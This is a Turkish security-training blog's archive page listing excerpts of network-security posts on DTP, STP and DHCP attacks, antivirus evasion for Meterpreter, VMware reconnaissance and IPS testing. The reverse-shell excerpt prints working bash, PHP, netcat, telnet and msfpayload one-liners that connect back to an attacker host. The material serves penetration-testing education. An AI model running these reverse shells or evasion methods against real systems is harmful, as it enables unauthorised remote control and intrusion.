Network Security Etiketli Yazılar

BGA Blog yazıları

DTP Protokolü ve Saldırı Yöntemleri
2015

DTP Protokolü ve Saldırı Yöntemleri

Dinamik Trunk Protokolü(DTP) Dinamik Trunk Protokolü, sanal ağlara(VLAN) sahip katman 2 cihazlarının arasındaki bağlantı türlerini, anlaşmalar(negotiation) yoluyla otomatik olarak belirleyen, Cisco Sistemleri tarafından geliştirilmiş ağ protokolüdür. DTP, katman 2’de çalışmaktadır.                         Katman 2 cihazlarının sahip olduğu arayüzler kullanım ihtiyacına göre ayarlanabilmektedir. Access Modu: Genellikle istemci/sunucu makinelerle bağlantı aşamasında kullanılmaktadır. Access modu aktif olan arayüzlere yalnızca bir sanal ağ atanabilmektedir. Bu modda DTP protokolünün etkisi bulunmamaktadır. Switch(config)#interface fastEthernet 1/15 Switch(config-if)#switchport mode access…
Devamı
STP Saldırı Yöntemleri (İkinci Katman Saldırıları)
2015

STP Saldırı Yöntemleri (İkinci Katman Saldırıları)

Spanning Tree Protokolü Nedir? Spanning Tree Protokolü(STP) karmaşık ağ topolojilerinde Katman 2 cihazlarının(Switch), birbiriyle haberleşmesi sırasında meydana gelebilecek sonsuz döngüleri(loop) engelleyen bir Katman 2 protokolüdür. STP, döngüleri engellemek için switch üzerinde bulunan bazı portları bloke durumuna(Block State) getirmektedir. Switchler, port durumlarını(Port State) değiştirecek STP bilgilerini Bridge Protocol Data Unit aracılığıyla paylaşmaktadır. Tüm Katman 2 cihazları birbirleriyle Bridge Protocol Data Unit(BPDU) adı verilen özel çerçeveler(frame) aracılığıyla haberleşmektedir. Çerçeveler,  döngülerin oluşmasını engelleyecek ve bunu…
Devamı
2015

DHCP Servisine Yönelik Saldırı Çeşitleri (DHCP Starvation & Rogue DHCP)

Dynamic Host Configuration Protocol, istemcilere(client) IP Adres, Ağ Maskesi(Ağ Maskesi), DNS Sunucusu, Varsayılan Ağ Geçidi(Default Gateway) gibi ayar bilgilerini otomatik olarak sağlayan bir istemci/sunucu protokolüdür. DHCP Starvation saldırısı ile bir ağın DHCP Sunucusu’ı cevap veremez ve IP dağıtamaz hale gelebilmektedir. Hemen ardından saldırgan tarafından kurulacak olan Sahte DHCP Sunucusu ile ise ağdaki yeni istemcilerin DNS, ağ geçidi gibi adres bilgilerini saldırganın amacı doğrultusunda dağıtmak mümkün olmaktadır.             DHCP Starvation Saldırı Yöntemi: Eğer…
Devamı
Uygulamalı Ağ Güvenliği ve TCP/IP Eğitimi Lab Kitabı [yeni]
2014

Uygulamalı Ağ Güvenliği ve TCP/IP Eğitimi Lab Kitabı [yeni]

Bilgi Güvenliği AKADEMİSİ olarak verdiğimiz eğitimlerde uygulamaya özel önem veriyoruz. Güvenlik gibi karmaşık bir konu detaylı uygulamalar gerçekleştirmeden anlatıldığında konuya yabancı olan katılımcılar tarafından tam olarak anlaşılamamaktadır. Eğitim notlarına destek olmak amacıyla başlattığımız lab çalışmalarını içeren kitapçık çalışmalarını uzun süre önce başlamıştık. Bu konuda ilk kitap çalışmamız olan  Beyaz Şapkalı Hacker eğitimi Lab kitapçığını 2013 yılı başlarında öğrencilerimizin kullanımına sunmuştuk (Detaylarına http://blog.bga.com.tr/2013/01/beyaz-sapkal-hacker-egitimi-lab-kitapcg.html adresinden erişilebilir)Yeni dönem eğitimlerinde Uygulamalı Ağ Güvenliği Lab Kitabı Çalışması,…
Devamı
Temel Web Uygulama Güvenliği Sunumu
2012

Temel Web Uygulama Güvenliği Sunumu

Bilgi Güvenliği AKADEMİSİ olarak BG-101 eğitimleri serisine destek amaçlı hazırlamış olduğumuz sunumu sizlerle paylaşıyoruz.Hazırlanan online sunuma  http://www.bga.com.tr/calismalar/websec/ adresinden erişim sağlanabilir.Yakın bir zamanda bununla paralel olarak Web Uygulama Güvenliği Eğitimi - 101 şeklinde yeni bir eğitim yayınlayacağız.Eğitimle ilgili geri bildirimler için egitim@bga.com.tr adresine e-posta gönderebilirsiniz.
Devamı
Backtrack Linux-101 Eğitimi (Ücretsiz)
2012

Backtrack Linux-101 Eğitimi (Ücretsiz)

Türkiye'deki bilişim güvenliği çalışmalarına somut katkı vermek amacıyla Bilgi/Bilişim Güvenliği-101 eğitimi serisi başlatmış bulunuyoruz. 101 eğitimleri serisi önce belirli konularda online eğitimler -ilk aşamada sunum olarak yayınlanacak- sonraki aşamada eğitimlere ait online sınavlar ve en son olarak genel katkıya açık wiki sayfaları hazırlanacaktır. Uzun soluklu bir çalışma olarak planlanan BG-101 serisi aşağıdaki temel eğitimleri içermektedir. DDoS Saldırıları ve Savunma Yolları 101 Eğitimi Web Uygulama Güvenliği 101 Eğitimi Ağ Temelleri ve Güvenliği 101…
Devamı
Antivirus Bypass Teknikleri ve Tanınmaz Meterpreter Ajanı Oluşturma
2012

Antivirus Bypass Teknikleri ve Tanınmaz Meterpreter Ajanı Oluşturma

Pentest çalışmalarında, hedef sistemi ele geçirdikden sonra yetkisiz işlevleri yerine getirecek bir payload'a ihtiyaç duyulur. Bu bir casus yazılım olabilir (trojan), uzakdan yönetim aracı olabilir (rat) veya hedef sistemde kod/komut çalıştırmanıza olanak sağlayan bir araç   (shellcode exec) olabilir.BGA pentest ekibi, pentest çalışmalarında ve eğitimlerde multi platform çalışan ve gelişmiş özellikleri olan meterpreter payloadını sıklıkla tercih etmektedir.Antivirus veya sezgisel antilogger'lar bu tür durumlarda işinizi zorlaştırabilir. Bu yazıda, antiviruslerin çalışma prensiblerine kısaca değinilmiş…
Devamı
Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri
2012

Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

"Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri" konulu blog girdisinde, NAT arkasındaki sistemlere erişim mantığı ve örnek netcat uygulaması yer alıyor. Bu yazıda, farklı durumlarda pratik olarak reverse shell alma teknikleri bulunuyor;Not: Dinleme modunda "nc -lvp 443" komutu kullanılabilir.BASHbash -i >& /dev/tcp/1.1.1.1/443 0>&1  (Red hat tabanlı sistemler için)PHPphp -r '$sock=fsockopen("1.1.1.1",443);exec("/bin/sh -i <&3 >&3 2>&3");'Netcatnc -e /bin/sh 1.1.1.1 443Telnettelnet 1.1.1.1 4444 | /bin/bash | telnet 1.1.1.1 443Windows Reverse Shell (metasploit)#msfpayload windows/shell/reverse_tcp LHOST=1.1.1.1…
Devamı
Vmware Sanallaştırma Sistemlerine Yönelik Keşif ve Bilgi Toplama
Teknikleri
2012

Vmware Sanallaştırma Sistemlerine Yönelik Keşif ve Bilgi Toplama Teknikleri

Metsploit Framework aracında bulunan VMware Auxiliary modülleri ile, yerel ağdaki vmware sistemlerini, vmware kullanıcı ve gruplarını tespit edebilir ve yetkileri hakkında bilgi toplayabilirsiniz. Vmhost ESX/ESXI üzerinde mi çalışıyor, versiyon bilgilerini alabilirsiniz. VMWare ile ilgili tüm yardımcı araçları bulmak için aşağıdaki arama komutunu kullanabilirsiniz;msf > search type:auxiliary vmwareMatching Modules================Name Disclosure Date Rank Description---- --------------- ---- -----------auxiliary/admin/vmware/poweroff_vm normal VMWare Power Off Virtual Machineauxiliary/admin/vmware/poweron_vm normal VMWare Power On Virtual Machineauxiliary/admin/vmware/tag_vm normal VMWare Tag Virtual Machineauxiliary/admin/vmware/terminate_esx_sessions normal…
Devamı
Intrusion Prevention System Stateful Signature Inspection Testleri
2012

Intrusion Prevention System Stateful Signature Inspection Testleri

Saldırı Engelleme Sistemleri günümüz sınır güvenliğin akla gelen ilk bileşenlerden biridir. IPS'ler klasik güvenlik duvarlarından farklı olarak barındırdıkları DPI(Deep Packet Inspection) altyapılarıyla protokollere ait tüm detay alanları inceleyebilir ve bu alanlar içerisinde isteğe bağlı olarak paketleri engelleyebilir.Günümüz sistemlerinde kullanılan IPS'lerin tamamı stateful mimaride çalışır. Stateful packet inspection (Durum korumalı paket inceleme) IPS'in ya da Firewall'un üzerinden geçirdiği her paketi bağımsız olarak incelemesi yerine paketler arasındaki ilişkiyi gozetleyerek daha akıllı kararlar verebilmesini sağlar.…
Devamı